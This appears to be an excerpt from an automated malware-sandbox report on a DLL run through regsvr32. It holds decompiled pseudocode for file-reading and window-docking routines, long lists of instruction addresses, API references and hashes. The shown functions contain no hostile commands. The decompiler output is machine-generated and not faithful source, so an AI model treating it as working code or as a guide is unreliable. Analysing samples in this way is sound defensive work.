																_t353 =  *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8));
																__eflags = _t353[_t394 + 8] & 0x00000048;
																if((_t353[_t394 + 8] & 0x00000048) == 0) {
																	__eflags = _t358 - _t406;
																	if(__eflags != 0) {
																		L62:
																		r8d = 1;
																		E100488B0(_t314,  *((intOrPtr*)(_t397 + 0x80)), _t336, __eflags, _t353, _t358, 0xffffffff, _t385, _t392, _t394, _t400);
																		__eflags =  *(_t397 + 0x90) - 0xa;
																		if( *(_t397 + 0x90) == 0xa) {
																			_t400 = 0x10000000;
																		} else {
																			 *_t358 = 0xd;
																			_t358 = _t358 + 1;
																			_t400 = 0x10000000;
																		}
																		goto L66;
																	}
																	__eflags =  *(_t397 + 0x90) - 0xa;
																	if(__eflags != 0) {
																		goto L62;
																	}
																	 *_t358 = 0xa;
																	_t358 = _t358 + 1;
																	goto L66;
																}
																__eflags =  *(_t397 + 0x90) - 0xa;
																if( *(_t397 + 0x90) != 0xa) {
																	 *_t358 = 0xd;
																	_t367 =  *((intOrPtr*)(0x10000000 + 0x772a0 + _t410 * 8));
																	 *((char*)(_t367 + _t394 + 9)) =  *(_t397 + 0x90) & 0x000000ff;
																	_t358 = _t358 + 1;
																} else {
																	 *_t358 = 0xa;
																	_t358 = _t358 + 1;
																}
																goto L66;
															}
															_t298 = GetLastError();
															__eflags = _t298;
															if(_t298 != 0) {
																goto L64;
															}
															goto L54;
														} else {
															__eflags = _t385[1] - 0xa;
															_t105 =  &(_t385[1]); // 0x1
															_t353 = _t105;
															if(_t385[1] != 0xa) {
																 *_t358 = 0xd;
																_t358 = _t358 + 1;
																_t385 = _t353;
															} else {
																_t385 =  &(_t385[2]);
																 *_t358 = 0xa;
																_t358 = _t358 + 1;
															}
															goto L66;
														}
													} else {
														 *_t358 = _t293;
														_t358 = _t358 + 1;
														_t385 =  &(_t385[1]);
														L66:
														__eflags = _t385 - _t392;
														if(_t385 < _t392) {
															continue;
														}
														goto L71;
													}
												}
												_t353 =  *((intOrPtr*)(_t400 + 0x772a0 + _t410 * 8));
												__eflags = _t353[_t394 + 8] & 0x00000040;
												if((_t353[_t394 + 8] & 0x00000040) != 0) {
													_t358 = _t358 + 1;
													__eflags = _t358;
													 *(_t358 - 1) =  *_t385 & 0x000000ff;
												} else {
													_t353[_t394 + 8] = _t353[_t394 + 8] | 0x00000002;
												}
												goto L71;
											}
										}
										__eflags =  *_t406 - 0xa;
										if( *_t406 != 0xa) {
											goto L42;
										} else {
											_t353[_t394 + 8] = _t353[_t394 + 8] | 0x00000004;
											goto L43;
										}
									} else {
										E1003AF40(_t352);
										 *_t352 = 0xc;
										E1003AF70(__eflags, _t352);
										 *_t352 = 8;
										_t42 = _t406 - 1; // -1
										_t259 = _t42;
										L17:
										goto L18;
									}
								}
								L16:
								E1003AF70(__eflags, _t352);
								 *_t352 = r14d;
								E1003AF40(_t352);
								r9d = 0;
								r8d = 0;
								__eflags = 0;
								 *_t352 = 0x16;
								 *((long long*)(_t397 + 0x20)) = _t412;
								E1003C790(_t354, _t365, _t376, 0xfffffffe, _t389, _t394, _t399);
								_t259 = 0xffffffff;
								goto L17;
							}
							__eflags = _t320 != 1;
							if(_t320 != 1) {
								L14:
								_t406 = _t376;
								goto L24;
							}
							__eflags =  !_t314 & 0x00000001;
							if(__eflags == 0) {
								goto L16;
							} else {
								_t314 = _t314 & 0xfffffffe;
								__eflags = _t314;
								goto L14;
							}
						} else {
							E1003AF70(__eflags, __ecx);
							 *__ecx = r14d;
							E1003AF40(__ecx);
							r9d = 0;
							r8d = 0;
							 *__ecx = 0x16;
							 *((long long*)(_t397 + 0x20)) = __r14;
							E1003C790(__rbx, _t365, __rdx, 0xfffffffe, __rsi, _t394, 0x10000000);
							_t24 = _t412 - 1; // -1
							_t259 = _t24;
							goto L18;
						}
					} else {
						E1003AF70(__eflags, __ecx);
						r14d = 0;
						 *__ecx = r14d;
						E1003AF40(__ecx);
						r9d = 0;
						r8d = 0;
						 *__ecx = 9;
						 *((long long*)(_t397 + 0x20)) = __r14;
						E1003C790(__rbx, _t365, __rdx, 0xfffffffe, __rsi, _t394, 0x10000000);
						_t19 = _t412 - 1; // -1
						_t259 = _t19;
						L19:
						goto L20;
					}
				} else {
					E1003AF70(_t351, __ecx);
					r14d = 0;
					 *__ecx = r14d;
					E1003AF40(__ecx);
					 *__ecx = 9;
					_t259 = 0xffffffffffffffff;
					L20:
					return _t259;
				}
			}


















































                                                                              0x10050f80
                                                                              0x10050f80
                                                                              0x10050f80
                                                                              0x10050f80
                                                                              0x10050f80
                                                                              0x10050f80
                                                                              0x10050f85
                                                                              0x10050f8d
                                                                              0x10050f95
                                                                              0x10050f9a
                                                                              0x10050fa4
                                                                              0x10050fa9
                                                                              0x10050fac
                                                                              0x10050fae
                                                                              0x10050fb3
                                                                              0x10050fd3
                                                                              0x10050fd5
                                                                              0x10051810
                                                                              0x10051810
                                                                              0x10051815
                                                                              0x10051818
                                                                              0x1005181b
                                                                              0x10051820
                                                                              0x10051823
                                                                              0x1005182a
                                                                              0x10051830
                                                                              0x10051835
                                                                              0x1005183a
                                                                              0x1005183a
                                                                              0x00000000
                                                                              0x1005183a
                                                                              0x10050fdb
                                                                              0x10050fe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10050fe7
                                                                              0x10050fec
                                                                              0x10050fef
                                                                              0x10050ffa
                                                                              0x10051001
                                                                              0x10051005
                                                                              0x10051009
                                                                              0x10051011
                                                                              0x10051016
                                                                              0x10051018
                                                                              0x1005104d
                                                                              0x10051050
                                                                              0x10051052
                                                                              0x10051057
                                                                              0x1005105a
                                                                              0x10051809
                                                                              0x10051809
                                                                              0x1005110f
                                                                              0x00000000
                                                                              0x1005110f
                                                                              0x10051060
                                                                              0x10051062
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051068
                                                                              0x1005106b
                                                                              0x1005109a
                                                                              0x1005109f
                                                                              0x100510a4
                                                                              0x100510aa
                                                                              0x100510ad
                                                                              0x100510b4
                                                                              0x100510b4
                                                                              0x100510b7
                                                                              0x100510d5
                                                                              0x100510d7
                                                                              0x1005113a
                                                                              0x1005113c
                                                                              0x1005113e
                                                                              0x10051143
                                                                              0x10051148
                                                                              0x1005114b
                                                                              0x1005114e
                                                                              0x1005116d
                                                                              0x10051174
                                                                              0x10051174
                                                                              0x1005117c
                                                                              0x1005117f
                                                                              0x10051184
                                                                              0x1005118a
                                                                              0x1005118f
                                                                              0x10051192
                                                                              0x10051198
                                                                              0x1005119a
                                                                              0x100511a0
                                                                              0x100511a4
                                                                              0x100511ac
                                                                              0x100511af
                                                                              0x100511b2
                                                                              0x100511b2
                                                                              0x100511b7
                                                                              0x100511bc
                                                                              0x100511c1
                                                                              0x100511c3
                                                                              0x100511cb
                                                                              0x100511d0
                                                                              0x100511d3
                                                                              0x100511d5
                                                                              0x100511d7
                                                                              0x100511d9
                                                                              0x100511db
                                                                              0x100511e3
                                                                              0x100511e6
                                                                              0x100511e9
                                                                              0x100511ed
                                                                              0x100511f2
                                                                              0x100511f7
                                                                              0x100511f9
                                                                              0x10051201
                                                                              0x10051206
                                                                              0x10051209
                                                                              0x1005120b
                                                                              0x1005120d
                                                                              0x1005120f
                                                                              0x10051211
                                                                              0x10051219
                                                                              0x1005121d
                                                                              0x10051222
                                                                              0x10051222
                                                                              0x10051225
                                                                              0x10051225
                                                                              0x1005120d
                                                                              0x10051209
                                                                              0x100511f7
                                                                              0x100511d7
                                                                              0x100511d3
                                                                              0x100511c1
                                                                              0x1005119a
                                                                              0x10051192
                                                                              0x10051237
                                                                              0x1005123a
                                                                              0x1005123e
                                                                              0x10051243
                                                                              0x10051249
                                                                              0x1005124b
                                                                              0x1005176d
                                                                              0x1005176d
                                                                              0x10051773
                                                                              0x10051776
                                                                              0x1005179d
                                                                              0x100517a0
                                                                              0x100517b1
                                                                              0x100517b6
                                                                              0x100517be
                                                                              0x100517a2
                                                                              0x100517a2
                                                                              0x100517aa
                                                                              0x100517aa
                                                                              0x10051778
                                                                              0x10051778
                                                                              0x1005177d
                                                                              0x10051783
                                                                              0x10051788
                                                                              0x10051790
                                                                              0x10051796
                                                                              0x10051796
                                                                              0x100517ef
                                                                              0x100517ef
                                                                              0x100517f2
                                                                              0x100517f7
                                                                              0x100517f7
                                                                              0x100517fc
                                                                              0x100517ff
                                                                              0x10051802
                                                                              0x00000000
                                                                              0x10051802
                                                                              0x10051251
                                                                              0x10051256
                                                                              0x10051258
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051260
                                                                              0x10051263
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051269
                                                                              0x10051270
                                                                              0x10051272
                                                                              0x1005127a
                                                                              0x1005127f
                                                                              0x100517e7
                                                                              0x00000000
                                                                              0x100517e7
                                                                              0x10051285
                                                                              0x10051289
                                                                              0x10051587
                                                                              0x10051589
                                                                              0x1005159a
                                                                              0x1005159a
                                                                              0x1005159a
                                                                              0x1005159a
                                                                              0x1005159f
                                                                              0x1005159f
                                                                              0x100515a2
                                                                              0x100515a5
                                                                              0x100515a8
                                                                              0x100515ac
                                                                              0x100515af
                                                                              0x10051754
                                                                              0x10051754
                                                                              0x10051765
                                                                              0x00000000
                                                                              0x10051765
                                                                              0x100515c0
                                                                              0x100515c0
                                                                              0x100515c3
                                                                              0x100515c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100515cd
                                                                              0x100515d1
                                                                              0x100515e3
                                                                              0x100515e3
                                                                              0x100515e7
                                                                              0x100515ea
                                                                              0x10051630
                                                                              0x10051636
                                                                              0x1005163a
                                                                              0x1005163f
                                                                              0x10051645
                                                                              0x10051647
                                                                              0x10051657
                                                                              0x10051657
                                                                              0x1005165c
                                                                              0x1005170f
                                                                              0x1005170f
                                                                              0x10051714
                                                                              0x10051718
                                                                              0x10051728
                                                                              0x10051728
                                                                              0x1005172b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051731
                                                                              0x10051662
                                                                              0x10051669
                                                                              0x10051671
                                                                              0x10051676
                                                                              0x100516c8
                                                                              0x100516cb
                                                                              0x100516e0
                                                                              0x100516e7
                                                                              0x100516f0
                                                                              0x100516f5
                                                                              0x100516fb
                                                                              0x10051721
                                                                              0x100516fd
                                                                              0x100516fd
                                                                              0x10051702
                                                                              0x10051706
                                                                              0x10051706
                                                                              0x00000000
                                                                              0x100516fb
                                                                              0x100516cd
                                                                              0x100516d3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100516d5
                                                                              0x100516da
                                                                              0x00000000
                                                                              0x100516da
                                                                              0x10051678
                                                                              0x1005167e
                                                                              0x1005168e
                                                                              0x100516a0
                                                                              0x100516b1
                                                                              0x100516b5
                                                                              0x100516bd
                                                                              0x100516c1
                                                                              0x10051680
                                                                              0x10051680
                                                                              0x10051685
                                                                              0x10051685
                                                                              0x00000000
                                                                              0x1005167e
                                                                              0x10051649
                                                                              0x1005164f
                                                                              0x10051651
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051651
                                                                              0x100515ec
                                                                              0x100515f1
                                                                              0x100515f1
                                                                              0x100515f5
                                                                              0x10051609
                                                                              0x1005160e
                                                                              0x10051612
                                                                              0x100515f7
                                                                              0x100515f7
                                                                              0x100515fb
                                                                              0x10051600
                                                                              0x10051600
                                                                              0x00000000
                                                                              0x100515f5
                                                                              0x100515d3
                                                                              0x100515d6
                                                                              0x100515da
                                                                              0x00000000
                                                                              0x100515da
                                                                              0x10051733
                                                                              0x1005173b
                                                                              0x10051740
                                                                              0x1005174c
                                                                              0x1005174c
                                                                              0x10051750
                                                                              0x10051742
                                                                              0x10051742
                                                                              0x10051742
                                                                              0x00000000
                                                                              0x10051740
                                                                              0x1005158b
                                                                              0x10051591
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051593
                                                                              0x00000000
                                                                              0x10051593
                                                                              0x1005128f
                                                                              0x10051291
                                                                              0x100512a1
                                                                              0x100512a1
                                                                              0x100512a1
                                                                              0x100512a1
                                                                              0x100512a6
                                                                              0x100512a6
                                                                              0x100512a9
                                                                              0x100512ac
                                                                              0x100512af
                                                                              0x100512b3
                                                                              0x100512b6
                                                                              0x1005142c
                                                                              0x1005142e
                                                                              0x10051431
                                                                              0x10051435
                                                                              0x100517d6
                                                                              0x00000000
                                                                              0x100517de
                                                                              0x1005143b
                                                                              0x1005143d
                                                                              0x100517c5
                                                                              0x00000000
                                                                              0x100517cd
                                                                              0x10051443
                                                                              0x10051446
                                                                              0x1005144a
                                                                              0x1005144c
                                                                              0x1005145a
                                                                              0x1005145f
                                                                              0x10051467
                                                                              0x1005148f
                                                                              0x1005148f
                                                                              0x10051492
                                                                              0x1005149b
                                                                              0x1005149d
                                                                              0x100514bf
                                                                              0x100514c1
                                                                              0x100514cb
                                                                              0x100514d3
                                                                              0x100514d8
                                                                              0x10051523
                                                                              0x10051529
                                                                              0x1005152c
                                                                              0x100514da
                                                                              0x100514da
                                                                              0x100514de
                                                                              0x100514e1
                                                                              0x100514e5
                                                                              0x100514e7
                                                                              0x100514f2
                                                                              0x100514f2
                                                                              0x100514f6
                                                                              0x100514f6
                                                                              0x100514fa
                                                                              0x100514fd
                                                                              0x100514ff
                                                                              0x1005150a
                                                                              0x1005150e
                                                                              0x1005150e
                                                                              0x10051512
                                                                              0x10051515
                                                                              0x100514c3
                                                                              0x100514c3
                                                                              0x100514c6
                                                                              0x10051531
                                                                              0x10051535
                                                                              0x10051542
                                                                              0x10051548
                                                                              0x10051553
                                                                              0x10051558
                                                                              0x1005155e
                                                                              0x10051560
                                                                              0x10051562
                                                                              0x10051579
                                                                              0x10051564
                                                                              0x1005156c
                                                                              0x10051571
                                                                              0x10051571
                                                                              0x10051571
                                                                              0x00000000
                                                                              0x10051562
                                                                              0x1005149f
                                                                              0x100514a4
                                                                              0x100514ac
                                                                              0x100514b1
                                                                              0x00000000
                                                                              0x100514b1
                                                                              0x10051470
                                                                              0x10051470
                                                                              0x10051473
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051475
                                                                              0x10051478
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1005147e
                                                                              0x10051482
                                                                              0x10051485
                                                                              0x1005148d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1005148d
                                                                              0x00000000
                                                                              0x10051470
                                                                              0x00000000
                                                                              0x100512c0
                                                                              0x100512c0
                                                                              0x100512c0
                                                                              0x100512c3
                                                                              0x100512c5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100512cb
                                                                              0x100512cd
                                                                              0x100512de
                                                                              0x100512de
                                                                              0x100512e2
                                                                              0x100512e5
                                                                              0x1005131d
                                                                              0x10051325
                                                                              0x10051329
                                                                              0x1005132f
                                                                              0x10051333
                                                                              0x10051338
                                                                              0x1005133e
                                                                              0x10051340
                                                                              0x10051350
                                                                              0x10051350
                                                                              0x10051355
                                                                              0x100513ea
                                                                              0x100513ea
                                                                              0x100513ed
                                                                              0x100513f1
                                                                              0x00000000
                                                                              0x100513f1
                                                                              0x1005135b
                                                                              0x10051362
                                                                              0x1005136a
                                                                              0x1005136f
                                                                              0x100513a1
                                                                              0x100513a4
                                                                              0x100513b9
                                                                              0x100513c7
                                                                              0x100513cb
                                                                              0x100513d0
                                                                              0x100513d8
                                                                              0x100513fa
                                                                              0x100513da
                                                                              0x100513da
                                                                              0x100513dd
                                                                              0x100513e1
                                                                              0x100513e1
                                                                              0x00000000
                                                                              0x100513d8
                                                                              0x100513a6
                                                                              0x100513ae
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100513b0
                                                                              0x100513b3
                                                                              0x00000000
                                                                              0x100513b3
                                                                              0x10051371
                                                                              0x10051379
                                                                              0x10051384
                                                                              0x10051387
                                                                              0x10051397
                                                                              0x1005139b
                                                                              0x1005137b
                                                                              0x1005137b
                                                                              0x1005137e
                                                                              0x1005137e
                                                                              0x00000000
                                                                              0x10051379
                                                                              0x10051342
                                                                              0x10051348
                                                                              0x1005134a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100512e7
                                                                              0x100512e7
                                                                              0x100512eb
                                                                              0x100512eb
                                                                              0x100512ef
                                                                              0x10051301
                                                                              0x10051304
                                                                              0x10051308
                                                                              0x100512f1
                                                                              0x100512f1
                                                                              0x100512f5
                                                                              0x100512f8
                                                                              0x100512f8
                                                                              0x00000000
                                                                              0x100512ef
                                                                              0x100512cf
                                                                              0x100512cf
                                                                              0x100512d1
                                                                              0x100512d5
                                                                              0x10051401
                                                                              0x10051401
                                                                              0x10051404
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1005140a
                                                                              0x100512cd
                                                                              0x1005140c
                                                                              0x10051414
                                                                              0x10051419
                                                                              0x10051425
                                                                              0x10051425
                                                                              0x10051429
                                                                              0x1005141b
                                                                              0x1005141b
                                                                              0x1005141b
                                                                              0x00000000
                                                                              0x10051419
                                                                              0x100512b6
                                                                              0x10051293
                                                                              0x10051298
                                                                              0x00000000
                                                                              0x1005129a
                                                                              0x1005129a
                                                                              0x00000000
                                                                              0x1005129a
                                                                              0x10051150
                                                                              0x10051150
                                                                              0x10051155
                                                                              0x1005115b
                                                                              0x10051160
                                                                              0x10051166
                                                                              0x10051166
                                                                              0x10051105
                                                                              0x00000000
                                                                              0x1005110a
                                                                              0x1005114e
                                                                              0x100510d9
                                                                              0x100510d9
                                                                              0x100510de
                                                                              0x100510e1
                                                                              0x100510e6
                                                                              0x100510e9
                                                                              0x100510ee
                                                                              0x100510f0
                                                                              0x100510f6
                                                                              0x100510fb
                                                                              0x10051100
                                                                              0x00000000
                                                                              0x10051100
                                                                              0x100510b9
                                                                              0x100510bc
                                                                              0x100510c9
                                                                              0x100510c9
                                                                              0x00000000
                                                                              0x100510c9
                                                                              0x100510c2
                                                                              0x100510c4
                                                                              0x00000000
                                                                              0x100510c6
                                                                              0x100510c6
                                                                              0x100510c6
                                                                              0x00000000
                                                                              0x100510c6
                                                                              0x1005106d
                                                                              0x1005106d
                                                                              0x10051072
                                                                              0x10051075
                                                                              0x1005107a
                                                                              0x1005107d
                                                                              0x10051084
                                                                              0x1005108a
                                                                              0x1005108f
                                                                              0x10051094
                                                                              0x10051094
                                                                              0x00000000
                                                                              0x10051094
                                                                              0x1005101a
                                                                              0x1005101a
                                                                              0x1005101f
                                                                              0x10051022
                                                                              0x10051025
                                                                              0x1005102a
                                                                              0x1005102d
                                                                              0x10051034
                                                                              0x1005103a
                                                                              0x1005103f
                                                                              0x10051044
                                                                              0x10051044
                                                                              0x10051114
                                                                              0x00000000
                                                                              0x10051119
                                                                              0x10050fb5
                                                                              0x10050fb5
                                                                              0x10050fba
                                                                              0x10050fbd
                                                                              0x10050fc0
                                                                              0x10050fc5
                                                                              0x10050fcb
                                                                              0x1005111e
                                                                              0x10051134
                                                                              0x10051134

                                                                              APIs
                                                                                • Part of subcall function 1003D3A0: Sleep.KERNEL32(?,?,?,?,10042A23,?,?,?,?,10042AF7), ref: 1003D3DC
                                                                              • ReadFile.KERNEL32 ref: 10051243
                                                                              • ReadFile.KERNEL32 ref: 10051338
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10051923), ref: 10051342
                                                                              • MultiByteToWideChar.KERNEL32 ref: 10051558
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10051923), ref: 10051564
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10051923), ref: 1005176D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FileRead$ByteCharMultiSleepWide
                                                                              • String ID:
                                                                              • API String ID: 2634040340-0
                                                                              • Opcode ID: b86519bb7086b8a8c77da5b56938d0e9b8d1e69cd272d0afbaec7f658aeaa807
                                                                              • Instruction ID: 1d79b1687ab1a7e9ed8d149b96092a53db331e01ad9d9e96f87f15380b62ad62
                                                                              • Opcode Fuzzy Hash: b86519bb7086b8a8c77da5b56938d0e9b8d1e69cd272d0afbaec7f658aeaa807
                                                                              • Instruction Fuzzy Hash: 01220276B086C08AD721CF69D4403DD2BA1F786BE4F958216EEA947799DB3CC849C701
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10017A8C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 196windowCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E10017A8C(void* __ebx, void* __esi, long long __rcx, char* __rdx, char* __r8, void* __r14, void* __r15) {
				signed int _v72;
				char _v600;
				char _v616;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				signed int _v660;
				signed int _v664;
				void* _v680;
				signed int _v688;
				signed int _v696;
				void* __r12;
				void* __r13;
				signed char _t73;
				signed int _t99;
				void* _t107;
				void* _t110;
				signed int _t115;
				signed int _t116;
				void* _t121;
				signed int _t122;
				signed long long _t143;
				signed long long _t144;
				char* _t145;
				signed int _t154;
				char* _t170;
				char* _t178;
				long long _t179;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;

				_t189 = __r15;
				_t188 = __r14;
				_t181 = __r8;
				_t170 = __rdx;
				_t121 = __esi;
				_t107 = __ebx;
				_t180 =  &_v680;
				_t143 =  *0x1006f4c8; // 0x6f13091946cb
				_t144 = _t143 ^  &_v680;
				_v72 = _t144;
				_t145 = __r8;
				_t178 = __rdx;
				_t179 = __rcx;
				if(__rcx == 0) {
					E10016544();
					asm("int3");
				}
				if(_t170 == 0) {
					E10016544();
					asm("int3");
				}
				_t171 =  &_v640;
				GetWindowRect(??, ??);
				if( *((intOrPtr*)(_t178 + 0xf0)) != _t179) {
					L7:
					if( *(_t179 + 0x100) != 0 && ( *(_t178 + 0xe0) & 0x00000040) != 0) {
						 *(_t179 + 0xdc) =  *(_t179 + 0xdc) | 0x00000040;
					}
					 *(_t179 + 0xdc) =  *(_t179 + 0xdc) & 0xfffffff9;
					_t73 =  *(_t178 + 0xdc) & 0x00000006 |  *(_t179 + 0xdc);
					 *(_t179 + 0xdc) = _t73;
					if((_t73 & 0x00000040) == 0) {
						r8d = 0x104;
						E100162F4(_t110, _t121, _t144, _t178,  &_v600, _t181, _t183);
						_t171 =  &_v600;
						E10029A2C(_t108,  *((intOrPtr*)(_t179 + 0x40)),  &_v600, _t181, _t183);
					}
					_t122 = 1;
					_t115 = ( *(_t178 + 0xdc) ^  *(_t179 + 0xdc)) & 0x0000f000 ^  *(_t178 + 0xdc) | 0x00000f00;
					_t132 =  *(_t179 + 0x100);
					if( *(_t179 + 0x100) == 0) {
						_t116 = _t115 & 0xfffffffe;
						__eflags = _t116;
					} else {
						_t116 = _t115 | 0x00000001;
					}
					E1001846C(_t116, _t132, _t144, _t178);
					r12d = 0;
					if( *((intOrPtr*)(_t178 + 0xf0)) != _t179 && IsWindowVisible() != 0) {
						_v680 = 0x97;
						r9d = 0;
						r8d = 0;
						_t116 = 0;
						_v688 = r12d;
						_v696 = r12d;
						E1001621C(_t178, _t171);
						r12d = _t122;
					}
					_t136 = _t145;
					r13d = 0xffffffff;
					if(_t145 == 0) {
						_t182 = _t178;
						E1002D704(_t108, _t116, _t144, _t179 + 0x108,  *((intOrPtr*)(_t179 + 0x118)), _t178);
						_t173 =  *((intOrPtr*)(_t179 + 0x118));
						r8d = 0;
						__eflags = r8d;
						E1002D704(_t108, _t116, _t144, _t179 + 0x108,  *((intOrPtr*)(_t179 + 0x118)), _t178);
						r9d =  *0x10074c94; // 0x2
						r8d =  *0x10074c90; // 0x2
						_v680 = 0x115;
						r9d =  ~r9d;
						_v688 = 0;
						r8d =  ~r8d;
						_v696 = 0;
					} else {
						CopyRect();
						E1000C7AC(_t136, _t179,  &_v664);
						_t182 =  &_v616;
						asm("movaps xmm0, [esp+0x40]");
						asm("movdqa [esp+0x70], xmm0");
						asm("cdq");
						_v648 = (_v656 - _v664 - _t116 >> 1) + _v664;
						asm("cdq");
						_t173 = _t178;
						_v644 = (_v652 - _v660 - _t116 >> 1) + _v660;
						_t183 = _v648;
						_t99 = E10016AF0(_t107, _t144, _t179, _t178,  &_v616, _v648);
						r9d = _v660;
						r8d = _v664;
						_v680 = 0x114;
						_t108 = _v656 - r8d;
						_v688 = _v652 - r9d;
						_v696 = _v656 - r8d;
						r13d = _t99;
					}
					E1001621C(_t178, _t173);
					GetParent(??);
					E10011808(_t107, 0, _t144, _t144, _t173, _t182, _t183, _t185);
					if(_t144 != _t179) {
						_t173 =  *((intOrPtr*)(_t179 + 0x40));
						SetParent(??, ??);
						E10011808(_t107, 0, _t144, _t144,  *((intOrPtr*)(_t179 + 0x40)), _t182, _t183, _t185);
					}
					_t154 =  *((intOrPtr*)(_t178 + 0xf0));
					if(_t154 != _t179) {
						__eflags = _t154;
						if(_t154 != 0) {
							__eflags =  *(_t179 + 0x100);
							if( *(_t179 + 0x100) == 0) {
								L28:
								_t122 = 0;
								__eflags = 0;
							} else {
								__eflags =  *(_t154 + 0x100);
								if( *(_t154 + 0x100) != 0) {
									goto L28;
								}
							}
							r9d = _t122;
							r8d = 0xffffffff;
							goto L30;
						}
					} else {
						r9d = 0;
						r8d = r13d;
						L30:
						_t173 = _t178;
						E10017064(_t107, 0, _t144, _t154, _t178, _t183, _t186, _t187, _t188, _t189);
					}
					 *((long long*)(_t178 + 0xf0)) = _t179;
					if(r12d != 0) {
						_v680 = 0x57;
						r9d = 0;
						r8d = 0;
						_v688 = 0;
						_v696 = 0;
						E1001621C(_t178, _t173);
					}
					E10016FB8(_t107, _t108, _t121, _t144, _t179, _t178, _t182, _t183, _t184, _t186, _t187, _t188, _t189);
					E1001D2FC(_t144, _t179);
					 *(_t144 + 0x170) =  *(_t144 + 0x170) | 0x0000000c;
				} else {
					if(_t145 != 0) {
						_t171 = _t145;
						if(EqualRect(??, ??) == 0) {
							goto L7;
						}
					}
				}
				return E10038D20(_t108, _v72 ^ _t180);
			}







































                                                                              0x10017a8c
                                                                              0x10017a8c
                                                                              0x10017a8c
                                                                              0x10017a8c
                                                                              0x10017a8c
                                                                              0x10017a8c
                                                                              0x10017a95
                                                                              0x10017a9c
                                                                              0x10017aa3
                                                                              0x10017aa6
                                                                              0x10017ab1
                                                                              0x10017ab4
                                                                              0x10017ab7
                                                                              0x10017aba
                                                                              0x10017abc
                                                                              0x10017ac1
                                                                              0x10017ac1
                                                                              0x10017ac5
                                                                              0x10017ac7
                                                                              0x10017acc
                                                                              0x10017acc
                                                                              0x10017ad1
                                                                              0x10017ad6
                                                                              0x10017ae3
                                                                              0x10017b04
                                                                              0x10017b0b
                                                                              0x10017b16
                                                                              0x10017b16
                                                                              0x10017b1d
                                                                              0x10017b2d
                                                                              0x10017b35
                                                                              0x10017b3b
                                                                              0x10017b45
                                                                              0x10017b4e
                                                                              0x10017b57
                                                                              0x10017b5f
                                                                              0x10017b5f
                                                                              0x10017b6a
                                                                              0x10017b81
                                                                              0x10017b87
                                                                              0x10017b8e
                                                                              0x10017b94
                                                                              0x10017b94
                                                                              0x10017b90
                                                                              0x10017b90
                                                                              0x10017b90
                                                                              0x10017b9a
                                                                              0x10017b9f
                                                                              0x10017ba9
                                                                              0x10017bb9
                                                                              0x10017bc1
                                                                              0x10017bc4
                                                                              0x10017bc7
                                                                              0x10017bcc
                                                                              0x10017bd1
                                                                              0x10017bd6
                                                                              0x10017bdb
                                                                              0x10017bdb
                                                                              0x10017bde
                                                                              0x10017be1
                                                                              0x10017be7
                                                                              0x10017c8d
                                                                              0x10017c90
                                                                              0x10017c95
                                                                              0x10017ca3
                                                                              0x10017ca3
                                                                              0x10017ca6
                                                                              0x10017cab
                                                                              0x10017cb2
                                                                              0x10017cb9
                                                                              0x10017cc1
                                                                              0x10017cc4
                                                                              0x10017ccc
                                                                              0x10017ccf
                                                                              0x10017bed
                                                                              0x10017bf5
                                                                              0x10017c03
                                                                              0x10017c0c
                                                                              0x10017c11
                                                                              0x10017c16
                                                                              0x10017c23
                                                                              0x10017c2c
                                                                              0x10017c38
                                                                              0x10017c3b
                                                                              0x10017c44
                                                                              0x10017c48
                                                                              0x10017c4d
                                                                              0x10017c56
                                                                              0x10017c5f
                                                                              0x10017c67
                                                                              0x10017c6f
                                                                              0x10017c72
                                                                              0x10017c76
                                                                              0x10017c7a
                                                                              0x10017c7a
                                                                              0x10017cdc
                                                                              0x10017ce5
                                                                              0x10017cee
                                                                              0x10017cf6
                                                                              0x10017cf8
                                                                              0x10017d00
                                                                              0x10017d09
                                                                              0x10017d09
                                                                              0x10017d0e
                                                                              0x10017d18
                                                                              0x10017d22
                                                                              0x10017d25
                                                                              0x10017d27
